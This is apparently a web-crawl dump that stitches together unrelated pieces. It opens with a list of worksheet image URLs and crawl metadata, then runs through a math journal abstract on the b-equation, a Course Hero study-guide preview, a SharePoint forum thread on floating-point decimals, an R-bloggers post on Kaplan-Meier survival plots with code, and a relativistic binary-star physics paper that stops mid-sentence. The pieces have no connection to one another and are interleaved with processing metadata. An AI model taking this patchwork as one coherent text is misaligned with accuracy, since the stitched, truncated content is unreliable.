"http://winonarasheed.com/wp-content/uploads/area-shapes-worksheet-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheet-pound-shapes-area-and-perimeter-ora-exacta-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/pound-shapes-area-worksheet-free-worksheets-library-math-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-shapes-worksheet-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-2.jpg", null, "http://winonarasheed.com/wp-content/uploads/volume-of-irregular-shapes-worksheets-free-library-calculate-the-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/finding-the-perimeter-of-rectangles-and-pound-shapes-by-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheet-pound-shapes-area-and-perimeter-ora-exacta-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-shapes-worksheet-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-3.jpg", null, "http://winonarasheed.com/wp-content/uploads/find-the-area-pound-shapes-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-worksheet-counting-squares-l-x-pinterest-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheets-45-unique-area-posite-figures-worksheet-hi-res-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-and-perimeter-of-posite-shapes-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheets-45-unique-area-posite-figures-worksheet-hi-res-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/pound-shapes-area-worksheet-free-worksheets-library-math-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheets-45-unique-area-posite-figures-worksheet-hi-res-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-2.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-and-perimeter-of-posite-shapes-read-geometry-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-of-posite-figures-game-geometry-escape-room-math-by-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/910-best-geometria-images-on-pinterest-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/125-best-szagek-images-on-pinterest-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheets-45-unique-area-posite-figures-worksheet-hi-res-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-3.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheet-area-pound-shapes-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-and-perimeter-of-pound-shapes-a-pound-00-criabooks-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-and-perimeter-of-posite-shapes-read-geometry-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheet-area-pound-shapes-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/measurement-measure-and-calculate-the-perimeter-of-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheet-area-pound-shapes-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-2.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheet-area-pound-shapes-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-3.jpg", null, "http://winonarasheed.com/wp-content/uploads/volume-of-irregular-shapes-worksheets-free-library-calculate-the-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-and-perimeter-of-posite-shapes-read-geometry-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-2.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheet-area-pound-shapes-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-4.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8124806,"math_prob":0.59194624,"size":3976,"snap":"2020-45-2020-50","text_gpt3_token_len":835,"char_repetition_ratio":0.32779455,"word_repetition_ratio":0.67826086,"special_character_ratio":0.18158954,"punctuation_ratio":0.16138329,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9713893,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68],"im_url_duplicate_count":[null,1,null,1,null,2,null,2,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-27T20:17:25Z\",\"WARC-Record-ID\":\"<urn:uuid:54464833-483f-4114-9b95-47ffad4f043f>\",\"Content-Length\":\"67995\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ad1bc0dd-1bf6-4990-9886-5943791fb033>\",\"WARC-Concurrent-To\":\"<urn:uuid:569bf0f1-436c-430e-a13c-95ffc2339dae>\",\"WARC-IP-Address\":\"104.24.102.9\",\"WARC-Target-URI\":\"http://fronteirastral.com/area-of-compound-shapes-worksheet/\",\"WARC-Payload-Digest\":\"sha1:5XVTV676UNOAV2BCAAAFIXGLCFGGAKHU\",\"WARC-Block-Digest\":\"sha1:2NEBI7EL4DVBD2XINBW4PGJ2XXWA7ROL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107894759.37_warc_CC-MAIN-20201027195832-20201027225832-00299.warc.gz\"}"}
https://www.intlpress.com/site/pub/pages/journals/items/maa/content/vols/0023/0002/a001/index.html
[ "# Methods and Applications of Analysis\n\n## Volume 23 (2016)\n\n### Error estimate of the particle method for the $b$-equation\n\nPages: 119 – 154\n\nDOI: http://dx.doi.org/10.4310/MAA.2016.v23.n2.a1\n\n#### Authors\n\nYong Duan (School of Mathematical Sciences, University of Electronic Science and Technology of China, Chengdu, Sichuan, China)\n\nJian-Guo Liu (Department of Physics and Department of Mathematics, Duke University, Durham, North Carolina, U.S.A.)\n\n#### Abstract\n\nIn this paper, we establish the optimal error estimate of the particle method for a family of nonlinear evolutionary partial differential equations, or the so-called $b$-equation. The $b$-equation, including the Camassa–Holm equation and the Degasperis–Procesi equation, has many applications in diverse scientific fields. The particle method is an approximation of the $b$-equation in Lagrangian representation. We also prove short-time existence, uniqueness and regularity of the Lagrangian representation of the $b$-equation.\n\n#### Keywords\n\nCamassa–Holm equation, Degasperis–Procesi equation, Lagrangian representation, classical solution, particle method, peakon solutions, error estimate\n\n#### 2010 Mathematics Subject Classification\n\n35B65, 35C08, 35D35, 65M15, 65M75\n\nFull Text (PDF format)\n\nPublished 30 June 2016" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7730839,"math_prob":0.62610686,"size":1005,"snap":"2019-13-2019-22","text_gpt3_token_len":264,"char_repetition_ratio":0.15684316,"word_repetition_ratio":0.032520324,"special_character_ratio":0.23880596,"punctuation_ratio":0.16477273,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98562217,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-24T13:35:34Z\",\"WARC-Record-ID\":\"<urn:uuid:8d9ba3a8-db9c-4fa4-bc76-41c613ec6a2f>\",\"Content-Length\":\"8948\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e31a43a4-8b89-4b82-aa73-f48807b1020e>\",\"WARC-Concurrent-To\":\"<urn:uuid:ad99db0f-7e84-40c7-a4e8-f2d109da8128>\",\"WARC-IP-Address\":\"107.180.41.239\",\"WARC-Target-URI\":\"https://www.intlpress.com/site/pub/pages/journals/items/maa/content/vols/0023/0002/a001/index.html\",\"WARC-Payload-Digest\":\"sha1:E2CIYYBAGZHNBBGB7ABJNEJN664BTFG4\",\"WARC-Block-Digest\":\"sha1:UMQPOKI3HLQYAOQYOFEPPNPSX2MEUFEA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912203448.17_warc_CC-MAIN-20190324124545-20190324150545-00202.warc.gz\"}"}
https://www.coursehero.com/file/106656591/MOS-3330-Test-2-Caculation-Reviewpdf/
[ "", null, "# MOS 3330 Test 2 Caculation Review.pdf - 1 MOS 3330 Test 2...\n\n• 8\n• 100% (1) 1 out of 1 people found this document helpful\n\nCourse Hero uses AI to attempt to automatically extract content from documents to surface to you and others so you can study better, e.g., in search results, to enrich docs, and more. This preview shows page 1 - 3 out of 8 pages.\n\n1Western UniversityDAN ManagementMOS 3330MOS 3330 Test 2Calculation ReviewGeneral TipsRecommended steps for how to prepare for calculation questions in Test 2:1.Review computational examples in the lecture slides.Familiarize yourself with typical input data for an aggregate plan.Familiarize yourself with the format of the aggregate plan tableas shown in the lecture slides(you don’thave to memorize the column headings because they will be provided in the test).Understand how to calculate columns of the aggregate plan table and the total cost.Understand the aggregate plan examples shown in the lecture slides (Examples 1a to 1d and 2a to 2d)Understand the differences among level, chase, and hybrid approaches; for Test 2, you have to determinewhich one to use based on the description of the plan given in the test question.2.Download the formula sheet from the course web site.Test 2 covers themiddleone-third of the formula sheet.Recall that symbols arenotdefined on the formula sheet; you should know what they stand for.3.Study end-of-chapter problems in the textbook.The textbook questions may be confusing because they sometimes refer to hybrid cases as “level” or“chase”; also, their solutions sometimes include additional improvement, which was not specified in thequestion.If you get stuck with a textbook question,check the solutionright away and learn from it.You don’t have to do all problems in the textbook;see below for suggested problems.Rounding Reminder1.For a physical quantity (e.g., order quantity), the final answer should be an integer.2.For a dollar amount, the final answer should have two decimal points.Textbook Suggested ProblemsAggregate Planning (Chapter 13)For problems 1 to 7, some of the costs are provided per hour instead of per unit (the lecture slides typically provided costsper unit). All you have to do is to convert the cost per hour to the cost per unit once at the beginning, and you don’t havetoworry about conversion after that.For problems 1 to 7, the conversion has been done for you below:Convert cost per hour to cost per unit: (Regular-time labor cost per hour)(labor standard per unit) = (regular-timelaborcost per unit)= 126 = \\$72. This is the cost of regular production.(Overtime labor cost per hour) × (labor standard per unit) = (overtime laborcost per unit) =166 = \\$96. This is thecost of overtime production.Convert“time available” to “production rate”:(regular time available per period) / (labor standard per unit) = 160/6= 26.67. This is the regular production rate per worker per period.\n2Western UniversityDAN ManagementMOS 3330Convert “overtime available per period” to “production rate” = (overtime available per period) / (labor standard perunit) = 30/6 = 5. This is the overtime rate per worker per period. It works the same way as the regular productionrate.\n\nCourse Hero member to access this document\n\nCourse Hero member to access this document\n\nEnd of preview. Want to read all 8 pages?\n\nCourse Hero member to access this document\n\nTerm\nSpring\nProfessor\nIBBOTT\nTags\n175, Noble gas, DAN Management\n•", null, "•", null, "•", null, "" ]
[ null, "https://assets.coursehero.com/ssi/27b7037f838acd0278f7.svg", null, "https://www.coursehero.com/assets/img/doc-landing/start-quote.svg", null, "https://www.coursehero.com/assets/img/doc-landing/start-quote.svg", null, "https://www.coursehero.com/assets/img/doc-landing/start-quote.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8298737,"math_prob":0.75808305,"size":3205,"snap":"2023-14-2023-23","text_gpt3_token_len":747,"char_repetition_ratio":0.10809122,"word_repetition_ratio":0.0781893,"special_character_ratio":0.2146646,"punctuation_ratio":0.09948542,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9711209,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-27T00:34:26Z\",\"WARC-Record-ID\":\"<urn:uuid:7680b878-0077-41a7-a418-a1f3eef294a9>\",\"Content-Length\":\"515771\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:626182c5-beaa-4cea-8437-88e1cdff1f3a>\",\"WARC-Concurrent-To\":\"<urn:uuid:f4794f81-f41d-422b-a418-9f337c267e16>\",\"WARC-IP-Address\":\"104.17.92.47\",\"WARC-Target-URI\":\"https://www.coursehero.com/file/106656591/MOS-3330-Test-2-Caculation-Reviewpdf/\",\"WARC-Payload-Digest\":\"sha1:F3AKRUYSJN3YP2RIZF46AIZFD7VOSPX5\",\"WARC-Block-Digest\":\"sha1:MKFSSQAEV4X3234YTNUNNTXFDRPXCQUM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296946584.94_warc_CC-MAIN-20230326235016-20230327025016-00018.warc.gz\"}"}
https://sharepoint.stackexchange.com/questions/215642/numeric-field-of-type-calculated-column-will-show-extra-decimal-places-with-valu
[ "# Numeric field of type Calculated column will show extra decimal places with values of 99999\n\nI am working on a sharepoint server 2016. and i have a custom list with the following fields:-", null, "i am showing sample of a test data with a test column names, as these info is somehow confidential.\n\nnow as shown in the above picture, i am getting a value of `-6,999,95999999`, which is a result of the following calcualtion:-\n\n``````(5250 * 12 * 1) - (5833.33 * 12 * 1 )\n``````\n\nnow using the calculator on my windows machine, the result will be `-6999.96` .. so why inside my sharepoint calculated column i am getting `-6,999,95999999` instead?? also if i change the number `5833.33` to `4833.33` i will get a correct result without extra decimals as follow:-", null, "which is the result of the following equation :-\n\n``````(5250 * 12 * 1) - (4833.33 * 12 * 1 )\n``````\n\nso is there a way to avoid unwanted decimals and why there are showing on certain scenarios only? keeping in mind that all the numeric fields i am using and all the calculated columns are of type numeric and have automatic number of decimals..\n\n• Did you select number field type for your calculated column? This is where you can control the decimal. – SharePointer May 17 '17 at 7:19\n• @SMerchant as i mentioned before all the calculated columns i am using are of type numeric with automatic decimal points... now i do not want to control the decimals ,, as users can enter the number of decimals they like (this is the business requirment).. but i want the result of my equation to be equal to the number i am getting from my windows machine calculator.. or the calculator i use when i was in the high school or the result i get from excel !!! is this something SP can not deliver out of the box !!! and it should show extra 9999 decimals ? – john Gu May 17 '17 at 9:29\n• Yes, users can enter the decimal in the fields, but calculated fields are auto calculating based on the input so you can control the decimal points. I tested your numbers and I get the desired results. – SharePointer May 17 '17 at 9:55\n• It is not SP failing.. it's the CPU .. type `0.1+0.2` in the F12 Console. If the CPU can't calculated then how on earth can an Application like SharePoint running on that CPU? Excel IS a Calculator programmed to deal with all CPU flaws, SP is not a Calculator, not a Database, it is a CMS, so you have to do more correction work yourself... with the TEXT function – Danny '365CSI' Engelman May 17 '17 at 10:01\n• @SMerchant and what is the desired results which you get?? you did not get 99999 decimals ? – john Gu May 17 '17 at 11:20\n\n• I don't know your wife, so I can tell what your problem is (but by your responses I acknowledge your problems in this area). For SharePoint: What you get is what you get. And it is not SharePoint... it is computers in general... just typ `0.1 + 0.2` in a JavaScript console. Your 20 year old calculator doesn't have a 64 Bit Processor optimized to do important calculations fast and thus gets sloppy on edge-cases – Danny '365CSI' Engelman May 17 '17 at 9:55" ]
[ null, "https://i.stack.imgur.com/M5HCl.png", null, "https://i.stack.imgur.com/Gx0zd.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8712031,"math_prob":0.93342555,"size":1327,"snap":"2020-10-2020-16","text_gpt3_token_len":350,"char_repetition_ratio":0.106575966,"word_repetition_ratio":0.024291499,"special_character_ratio":0.31198192,"punctuation_ratio":0.13286713,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96693915,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-27T07:41:40Z\",\"WARC-Record-ID\":\"<urn:uuid:7e9dc9a9-a6fc-4b95-8916-9e2fbe413e8b>\",\"Content-Length\":\"152748\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:86bec427-c360-4cab-950e-6212fdc3859c>\",\"WARC-Concurrent-To\":\"<urn:uuid:0ceb5110-d6da-4a76-857c-8ed4a7b4b222>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://sharepoint.stackexchange.com/questions/215642/numeric-field-of-type-calculated-column-will-show-extra-decimal-places-with-valu\",\"WARC-Payload-Digest\":\"sha1:Q7X25RSSVQWPCXVG24MVZTGTFEOG3J3I\",\"WARC-Block-Digest\":\"sha1:P444SYEPWSN52OUIPFZKJVG3UH4EPPEJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875146665.7_warc_CC-MAIN-20200227063824-20200227093824-00529.warc.gz\"}"}
https://www.r-bloggers.com/kaplan-meier-survival-plot-with-at-risk-table/
[ "[This article was first published on Matt's Stats n stuff » R, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)\nWant to share your content on R-bloggers? click here if you have a blog, or here if you don't.\n\nCredit for the bulk of this code is to Abhijit Dasgupta and the commenters on the original post here from earlier this year. I have made a few changes to the functionality of this which I think warrant sharing.\n\nA brief intro, this function will use the output from a survival analysis fitted in R with ‘survfit’ from the ‘survival’ library, to plot a survival curve with the option to include a table with the numbers of those ‘at risk’ below the plot.\n\nChanges to Abhijits version included in here:\n\n• Ability to plot subgroups in multivariate analysis\n• Ability to set x and y limits (as an argument in the function)\n• Strata are now ordered (so strata order in legend will match that in ‘at risk’ table)\n• Minor changes to code layout/structure\nThe major change here, and the motive for toying with the code, was to be able to plot for subgroups. I don’t know how common it is to only have one variable in your survival analysis, but the way the code was set up was to plot one line for each unique level grouping in the analysis. So if you have gender, a two level treatment (A and B) and three age groups (1,2,3), you would get a line for males on treatment A aged 1, a line for males on treatment A aged 2, a line for males on treatment A aged 3, a line for males on treatment B aged 1 etc etc.\nThis is executed, as you can see, with a regular expression (assistance from bioinformatician Richard Francis appreciated).\nSo a basic plot, using Abhijit’s example, would now look like this.\n```library(survival)\ndata(colon)\nfit <- survfit(Surv(time,status)~rx, data=colon)\nggkm(fit, timeby=500, ystratalabs=c(\"Obs\",\"Lev\",\"Lev+5FU\"))```\n`", null, "", null, "`\nNote: the strata names are now in (the same) order in legend and the table below.\nNow say you had another variable you were adjusting for. I’ve assume that the ‘adhere’ variable in the data is full adherence to the treatment regime, and that 0 is Yes and 1 is No (logic to me had 0 as No and 1 as Yes but the 1′s seem to have a worse plot… will research the dataset and update when I get a chance).\n```colon\\$adhere <- factor(colon\\$adhere,labels =c(\"Yes\",\"No\"))\nfit <- survfit(Surv(time,status)~rx + adhere, data=colon)```\n\nHere we can plot just those that didn’t adhere to the treatment:\n\n`ggkm(fit, timeby=500, ystratalabs=c(\"Obs\",\"Lev\",\"Lev+5FU\"), subs=\"No\", main=\"Survival curve for those that don't adhere\")`\n`ggkm(fit, timeby=500, ystratalabs=c(\"Obs\",\"Lev\",\"Lev+5FU\"), subs=\"Yes\", main=\"Survival curve for those that do adhere\")`\nWith this you can now easily see the difference in survival for those that did not and those that did adhere to treatment.\nThis also works for multiple variables. Like if you had sex in the model too, you could use:\n`ggkm(fit, timeby=500, ystratalabs=c(\"Obs\",\"Lev\",\"Lev+5FU\"), subs=c(\"Yes\",\"Male\"), main=\"Survival curve for those Males that do adhere\")`\nAnd, here’s the code. Comments welcomed.\nCODE WAS BROKEN by an update in versions (either R or ggplot). Working code available here.", null, "", null, "" ]
[ null, "https://mcfromnz.files.wordpress.com/2011/11/surv_1.png", null, "http://mcfromnz.files.wordpress.com/2011/11/surv_1.png", null, "https://feeds.wordpress.com/1.0/comments/mcfromnz.wordpress.com/271/", null, "https://i0.wp.com/stats.wordpress.com/b.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9264365,"math_prob":0.7636536,"size":3720,"snap":"2020-34-2020-40","text_gpt3_token_len":964,"char_repetition_ratio":0.114639394,"word_repetition_ratio":0.10015898,"special_character_ratio":0.24596775,"punctuation_ratio":0.11011524,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9607686,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,1,null,1,null,5,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-14T14:54:38Z\",\"WARC-Record-ID\":\"<urn:uuid:9b423558-462a-4835-b057-82cdef84ce39>\",\"Content-Length\":\"72493\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f98f4891-28a3-4f3b-9ce1-9d66a6b8595c>\",\"WARC-Concurrent-To\":\"<urn:uuid:7eec82e6-93a0-47b6-b68f-96fbe394a721>\",\"WARC-IP-Address\":\"172.67.170.238\",\"WARC-Target-URI\":\"https://www.r-bloggers.com/kaplan-meier-survival-plot-with-at-risk-table/\",\"WARC-Payload-Digest\":\"sha1:E5SZLE235PCBD6TSZWRRE5SBRBPQULJG\",\"WARC-Block-Digest\":\"sha1:ZJRSFMOJ4EK7I6QXKFNFGYKP6WJGZLEN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439739328.66_warc_CC-MAIN-20200814130401-20200814160401-00107.warc.gz\"}"}
https://www.arxiv-vanity.com/papers/gr-qc/9805026/
[ "# Stability of coalescing binary stars against gravitational collapse: hydrodynamical simulations\n\nMasaru Shibata Department of Earth and Space Science, Graduate School of Science, Osaka University, Toyonaka, Osaka 560-0043, Japan    Thomas W. Baumgarte Department of Physics, University of Illinois at Urbana-Champaign, Urbana, Il 61801    Stuart L. Shapiro Departments of Physics and Astronomy, and NCSA, University of Illinois at Urbana-Champaign, Urbana, Il 61801\n###### Abstract\n\nWe perform simulations of relativistic binary stars in post-Newtonian gravity to investigate their dynamical stability prior to merger against gravitational collapse in a tidal field. In general, our equations are only strictly accurate to first post-Newtonian order, but they recover full general relativity for spherical, static stars. We study both corotational and irrotational binary configurations of identical stars in circular orbits. We adopt a soft, adiabatic equation of state with , for which the onset of instability occurs at a sufficiently small value of the compaction that a post-Newtonian approximation is quite accurate. For such a soft equation of state there is no innermost stable circular orbit, so that we can study arbitrarily close binaries. This choice still allows us to study all the qualitative features exhibited by any adiabatic equation of state regarding stability against gravitational collapse. We demonstrate that, independent of the internal stellar velocity profile, the tidal field from a binary companion stabilizes a star against gravitational collapse.\n\n###### pacs:\nPACS number(s): 04.30.Db, 04.25.Nx, 97.60.Jd, 97.80.Fk\n\n[\n\n]\n\n## I Introduction\n\nBinary neutron stars are known to exist and for some of these systems in our own galaxy (including PSR B1913+16 and B1534+12), general relativistic effects in the binary orbit have been measured to high precision [1, 2]. Interest in binary neutron stars has been stimulated by the prospect of future observations of extragalactic systems by gravitational wave interferometers like LIGO, VIRGO, TAMA and GEO. Binary neutron stars are among the most promising sources of gravitational waves for these detectors, and therefore it is important to predict theoretically the gravitational waveform emitted during the inspiral and the final coalescence of the two stars. Interest in these systems also arises on a more fundamental level, since the two-body problem is one of the outstanding unsolved problems in classical general relativity.\n\nConsiderable effort has gone into understanding binary neutron stars. Most of this work has been performed within the framework of Newtonian and post-Newtonian gravity (see, e.g.,  for a review and list of references). General relativistic treatments are currently only in their infancy. Recently, Wilson, Mathews and Marronetti  (hereafter WMM) reported results obtained with a relativistic hydrodynamics code. Their code assumed several simplifying physical and mathematical approximations. Their results suggest that the central densities of the stars increase as the stars approach each other and that massive neutron stars, stable in isolation, individually collapse to black holes prior to merger. WMM therefore find that in general relativity, the presence of a companion star and its tidal field tend to destabilize the stars in a binary system. This conclusion is contrary to what is expected from Newtonian , post-Newtonian [10, 11, 12], perturbative  and matched asymptotic expansion [14, 15] treatments of the problem. Constructing self-consistent, fully relativistic initial data for two neutron stars in a circular, quasi-equilibrium orbit does not show any evidence of this “crushing effect” either . Moreover, applying energy turning-point methods to sequences of these initial data suggests that inspiraling neutron star binaries are secularly stable all the way down to the innermost stable circular orbit . To summarize, most researchers currently believe that the maximum allowed rest mass of neutron stars in close binaries is larger than in isolation, and that their central density is smaller than in isolation. If there exists any destabilizing, relativistic effect at high post-Newtonian order, then this effect is much smaller than the dominating stabilizing effect of the tidal field.\n\nHowever, to date, the only fully dynamical treatment of the problem in general relativity – that of WMM – reports a star-crushing effect. In this paper, we perform a new, fully dynamical simulation for binary stars in post-Newtonian gravity. We use a formalism in which (1) all first post-Newtonian terms are taken into account, and (2) sufficient nonlinearity is retained, so that spherical, static stars satisfy the fully general relativistic equations exactly. As explained in section II below, this formalism is very suitable for studying binary neutron stars. We study relativistic effects in binary stars with , where and are typical values of the stellar mass and radius, so that a post-Newtonian treatment is completely adequate.\n\nBy performing a fully dynamical calculation, we can relax various constraints assumed in previous treatments. For example, Wiseman assumed the stars to remain spherically symmetric , Baumgarte et al.  assumed the binary stars to be corotating, and Thorne  assumed the stars’ orbital separation to be much larger than the stars’ radius. Here, we relax all these assumptions and study tidally deformed stars, both corotational and irrotational, at arbitrarily small separations. We still find that the presence of the tidal field of a companion star tends to stabilize neutron stars against catastrophic collapse.\n\nTo establish the stability of binary stars against collapse, we construct quasi-equilibrium initial data for identical binary neutron stars in a close, circular orbit. The idea is to show whether stars in a binary formed from the inspiral of objects which are stable in isolation remain stable at close separation. Our models have rest masses near the maximum allowed rest mass for spherical stars in isolation and thus provide the best candidates for collapse if the tidal field is destabilizing (stars with rest masses well below the maximum allowed value are unambiguously stable). In order to demonstrate that these stars are dynamically stable, we need to locate the onset of instability in the binary, and compare it with the onset of instability for isolated stars. Since the shift is fairly small, a very careful treatment with high numerical accuracy is necessary. We detail our method of locating the onset of instability in section IV.\n\nThe paper is organized as follows: In section II, we present the post-Newtonian formalism adopted in this paper. We calibrate our code in section III by locating the analytically known onset of radial instability of relativistic spherical stars against gravitational collapse . In section IV, we study the dynamical stability against gravitational collapse of close binary stars, and briefly summarize our results in section V.\n\n## Ii Formulation\n\nIn the usual post-Newtonian treatment, the fluid and field equations are derived by systematically expanding the Einstein equation and the relativistic hydrodynamic equations in powers of  . In this paper, we introduce a different approach. Since in a first order post-Newtonian approximation, the spatial metric may always be chosen conformally flat, we can derive post-Newtonian equations by starting with the relativistic equations written previously in the conformally flat approximation [8, 7]. We then neglect some of the second and higher order post-Newtonian terms, but retain sufficient nonlinearity so that this formalism recovers full general relativity for some limiting regimes of interest in this paper.\n\nWe write the spatial metric in the form\n\n γij=ψ4~γij=ψ4δij, (1)\n\nso that the line element becomes\n\n ds2 = gμνdxμdxν (2) = (−α2+βkβk)dt2+2βidxidt+ψ4δijdxidxj.\n\nHere, , and are the lapse function, the shift vector and the conformal factor and we adopt geometrized units in which . We also adopt cartesian coordinates , so that the covariant derivative associated with conveniently reduces to the ordinary partial derivative .\n\nWe employ a perfect fluid stress-energy tensor\n\n Tμν=ρ(1+ε+Pρ)uμuν+Pgμν, (3)\n\nwhere , , , and denote the rest mass density, specific internal energy, pressure, and the fluid four velocity, respectively. For initial data, we assume a constant entropy configuration with a polytropic pressure law\n\n P=KρΓ, (4)\n\nwhere and are constant and is the polytropic index. For the evolution of the matter we assume the adiabatic relation\n\n P=(Γ−1)ρε. (5)\n\nThe continuity equation is\n\n ∂ρ∗∂t+∂(ρ∗vi)∂xi=0 , (6)\n\nwhere and .\n\nThe relativistic Euler equation is\n\n ∂(ρ∗~ui)∂t+∂(ρ∗~uivj)∂xj = −αψ6P,i−ρ∗α~u0α,i (7) +ρ∗~ujβj ,i+2ρ∗~uk~ukψ5~u0ψ,i,\n\nand the energy equation is\n\n ∂e∗∂t+∂(e∗vj)∂xj=0, (8)\n\nwhere\n\n ~uj=(1+Γε)uj, (9) ~u0=(1+Γε)u0, (10) e∗=(ρ∗ε∗)1/Γ;ε∗=ε(αu0ψ6)Γ−1, (11) vi=−βi+ujψ4u0. (12)\n\nNote that in the conformal flat approximation. From the normalization condition , we find\n\n (αu0)2 =1+uiuiψ4 (13) =1+~ui~uiψ4[1+Γε∗(αu0ψ6)Γ−1]−2.\n\nIn our numerical simulation, we use 